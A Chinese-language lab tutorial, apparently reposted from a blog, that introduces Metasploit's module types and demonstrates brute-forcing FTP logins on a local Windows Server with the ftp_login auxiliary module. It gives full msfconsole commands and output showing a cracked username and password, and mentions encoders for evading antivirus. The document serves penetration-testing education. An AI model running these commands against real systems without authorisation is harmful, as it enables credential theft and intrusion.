kali下-MSF-ftp_login模块破解FTP账号及密码

发布时间:2024年01月18日

一、环境准备

两台设备在同一个网络内

一台kali系统:192.168.10.128

一台winserver2016:192.168.10.132

二、MSF介绍

metasploit 全称是The Metasploit Framework,又称MSF,是Kali 内置的一款渗透测试框架,也是全球最受欢迎的渗透测试工具之一。

MSF允许使用者开发自己的漏洞脚本,从而进行测试,它还可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,提供真正的安全风险情报等。

分为专业版和免费版,下载官网:https://www.metasploit.com/

MSF框架由多个模块组成,各个模块之间的功能如下:

1、auxiliary(辅助模块)该模块不会直接在测试者和目标主机之间建立访问,他们只会负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试

2、Exploit(漏洞利用模块)包括针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码

3、Payload(攻击模块)用于在目标系统上运行任意命令或者执行特定代码,在metasploit中可以自由地选择、传送和植入

4、Post(后期渗透模块)主要用于在取得目标系统远程控制权后,进行一系列地后渗透攻击动作,如获取敏感信息、实施跳板攻击等。

5、Encoders(编码工具模块)负责免杀
渗透攻击步骤:
1、扫描目标系统,寻找可用漏洞
2、选择并配置一个漏洞利用模块3、选择并配置一个攻击载荷模块
4、选择一个编码技术,用来绕过杀软5、攻击渗透

三、使用ftp_login模块破解FTP密码

┌──(root?kali)-[~]
└─# msfconsole   进入框架
msf6 > search ftp_login #搜索框架
msf6 > use 0   #使用框架
#设置目标主机
msf6 auxiliary(scanner/ftp/ftp_login) > set rhosts 192.168.10.132
#使用密码字典文件
msf6 auxiliary(scanner/ftp/ftp_login) > set pass_file /root/pass.txt
#关闭信任凭据
msf6 auxiliary(scanner/ftp/ftp_login) > set stop_on_success true
#设置登录的用户,可以是文件
msf6 auxiliary(scanner/ftp/ftp_login) > set username zhangsan
msf6 auxiliary(scanner/ftp/ftp_login) > set user_file  /root/user.txt
#攻击
msf6 auxiliary(scanner/ftp/ftp_login) > exploit
[*] 192.168.10.132:21     - 192.168.10.132:21 - Starting FTP login sweep
[+] 192.168.10.132:21     - 192.168.10.132:21 - Login Successful: zhangsan:admin.123
[*] 192.168.10.132:21     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

在这里插入图片描述

文章来源:https://blog.csdn.net/mogexiuluo/article/details/135679518
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。